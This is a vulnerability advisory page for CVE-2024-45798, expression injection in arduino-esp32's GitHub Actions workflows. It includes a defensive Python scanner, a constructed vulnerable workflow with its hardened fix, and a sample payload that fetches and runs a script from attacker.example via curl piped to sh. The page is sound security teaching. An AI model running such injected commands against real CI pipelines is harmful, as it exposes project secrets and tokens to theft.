RCE in Espressif Arduino-esp32
CVE-2024-45798
arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. The `arduino-esp32` CI (the repository's GitHub Actions workflows) contains multiple Poisoned Pipeline Execution (PPE) weaknesses: untrusted event data reaches workflow steps that execute it. Code injection in `te…
Vulnerability class: Poisoned Pipeline Execution (PPE) through GitHub Actions expression injection, i.e. untrusted event context interpolated into a `run:` step (the pattern the CodeQL actions command-injection query and the GitHub Security Lab "pwn requests" write-up describe).
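The bug class described above, as an added example that is not code from arduino-esp32, GitHub, or this advisory: a small scanner that flags untrusted `${{ }}` event fields spliced into `run:` steps, a constructed vulnerable workflow beside its hardened form, and a renderer showing what the shell actually receives. The workflow, the `post-results.sh` script name and the `attacker.example` payload are assumptions made for the demo; the untrusted-field list follows the GitHub Security Lab untrusted-input article in the references.

```python
"""Scanner for expression injection in GitHub Actions ``run:`` steps.

Added example for this advisory page. Not code from arduino-esp32, GitHub
or the advisory; the workflow below is constructed and is not the real
tests_results.yml. The field list follows the GitHub Security Lab article
on untrusted input that the page references.
"""
import re
from dataclasses import dataclass

# Event-payload fields that an external contributor (fork PR author, commit
# author, commenter) controls. Interpolating any of them into a script with
# ${{ }} is the "actions command injection" pattern the CodeQL query flags.
UNTRUSTED = [re.compile(p) for p in (
    r"github\.event\.issue\.(title|body)",
    r"github\.event\.pull_request\.(title|body)",
    r"github\.event\.pull_request\.head\.(ref|label|repo\.default_branch)",
    r"github\.event\.(comment|review|review_comment)\.body",
    r"github\.event\.pages\.[^.]+\.page_name",
    r"github\.event\.commits\.[^.]+\.(message|author\.(email|name))",
    r"github\.event\.head_commit\.(message|author\.(email|name))",
    r"github\.event\.workflow_run\.(head_branch|head_commit\.(message|author\.(email|name)))",
    r"github\.head_ref",
)]

RUN_RE = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")


@dataclass(frozen=True)
class Finding:
    line: int         # 1-based line in the workflow file
    expression: str   # the context expression inside ${{ }}


def _run_bodies(workflow_text):
    """Yield (line_number, script_line) for each line of every run: step.

    Minimal line-based YAML walk: a block scalar (run: | or run: >) extends
    over the following lines indented deeper than the run key itself.
    """
    lines = workflow_text.splitlines()
    i = 0
    while i < len(lines):
        m = RUN_RE.match(lines[i])
        if not m:
            i += 1
            continue
        key_col = lines[i].index("run:")
        rest = m.group(2)
        if rest[:1] in ("|", ">"):
            i += 1
            while i < len(lines) and (
                not lines[i].strip()
                or len(lines[i]) - len(lines[i].lstrip()) > key_col
            ):
                yield i + 1, lines[i]
                i += 1
        else:
            yield i + 1, rest
            i += 1


def find_injections(workflow_text):
    """Untrusted ${{ }} expressions spliced into run: scripts, with line numbers."""
    findings = []
    for lineno, script in _run_bodies(workflow_text):
        for expr in EXPR_RE.findall(script):
            if any(p.search(expr) for p in UNTRUSTED):
                findings.append(Finding(lineno, expr))
    return findings


def render(script_line, context):
    """Expand ${{ }} textually, as the runner does before the shell parses the
    script. Quoting in the script cannot help: the value lands in its source."""
    return EXPR_RE.sub(lambda m: context.get(m.group(1), ""), script_line)


def rendered_scripts(workflow_text, context):
    """Every run: script line as the shell receives it for the given payload."""
    return [render(line, context) for _, line in _run_bodies(workflow_text)]


# Constructed workflow_run workflow (assumption, not the project's file). It
# runs in the base repository with its secrets, but head_branch and the
# commit message come from whoever pushed the branch, e.g. a fork PR author.
VULNERABLE = """\
name: report
on:
  workflow_run:
    workflows: [tests]
    types: [completed]
jobs:
  report:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "Results for ${{ github.event.workflow_run.head_branch }}"
          ./post-results.sh "${{ github.event.workflow_run.head_commit.message }}"
"""

# Hardened form: the same values enter through env:, so they reach the shell
# as environment-variable data and never become part of the script text.
HARDENED = VULNERABLE.replace(
    '      - run: |\n'
    '          echo "Results for ${{ github.event.workflow_run.head_branch }}"\n'
    '          ./post-results.sh "${{ github.event.workflow_run.head_commit.message }}"\n',
    '      - env:\n'
    '          BRANCH: ${{ github.event.workflow_run.head_branch }}\n'
    '          MESSAGE: ${{ github.event.workflow_run.head_commit.message }}\n'
    '        run: |\n'
    '          echo "Results for $BRANCH"\n'
    '          ./post-results.sh "$MESSAGE"\n',
)

# Constructed attacker commit message: closes the quotes, runs a command.
EVIL = {"github.event.workflow_run.head_commit.message":
        '"; curl https://attacker.example/x | sh; echo "'}

if __name__ == "__main__":
    for f in find_injections(VULNERABLE):
        print(f"line {f.line}: untrusted expression {f.expression}")
    print("hardened findings:", find_injections(HARDENED))
    for script in rendered_scripts(VULNERABLE, EVIL):
        print("shell sees:", script)
```

Running it prints two findings for the vulnerable workflow (the `head_branch` and `head_commit.message` expressions), none for the hardened one, and the rendered second script line shows the attacker's `curl ... | sh` sitting unquoted in the shell source. The scanner is a line heuristic for review, not a replacement for the CodeQL query, which also follows data through step outputs and `env` indirections.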
EPSS: 0.003, i.e. an estimated 0.3% probability of exploitation activity in the wild within the next 30 days (55.3rd percentile among scored CVEs). A low EPSS does not lower the severity of a CI-secrets compromise for the project itself; it only says the issue is not being widely exploited.
CVSS v3.1 metrics
Base score as listed: 10.0 (Critical). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H. Note that this vector scores 9.9 under the CVSS v3.1 formula (PR:L with changed scope); a 10.0 requires PR:N. The score and the vector on this page therefore disagree, so check the GitHub advisory before quoting either. PR:L is consistent with the attack model: the attacker needs nothing more than the ability to open a pull request or push a branch from a fork.
Affected products
- Espressif arduino-esp32: all commits prior to a7cec020df8f1a815bd8dfd2559f51a2216bcf1c (fixed from that commit on). The weakness lives in the repository's GitHub Actions workflows, not in the Arduino core shipped to users, so the exposure is the project's CI secrets, repository token and anything the CI publishes, rather than firmware built with a given release.
Weakness classification (CWE)
- CWE-20: Improper Input Validation
References
- Vendor advisory: https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8
- CodeQL query help, expression injection in Actions: https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection
- Affected workflow as of commit 690bdb5: https://github.com/espressif/arduino-esp32/blob/690bdb511d9f001e2066da2dda2c631a3eee270f/.github/workflows/tests_results.yml
- GitHub Security Lab, Preventing pwn requests: https://securitylab.github.com/research/github-actions-preventing-pwn-requests
- GitHub Security Lab, Untrusted input in GitHub Actions: https://securitylab.github.com/research/github-actions-untrusted-input
Frequently asked questions
- What is CVE-2024-45798?
  - CVE-2024-45798 is a critical-severity Poisoned Pipeline Execution vulnerability in the GitHub Actions workflows of Espressif arduino-esp32, classified under Improper Input Validation: untrusted event data is injected into CI steps, giving an outside contributor code execution in the project's CI. Listed CVSS v3.1 score: 10.0/10. Published 2024-09-17.
- How severe is CVE-2024-45798?
  - Critical severity. The listed CVSS v3.1 base score is 10.0 out of 10.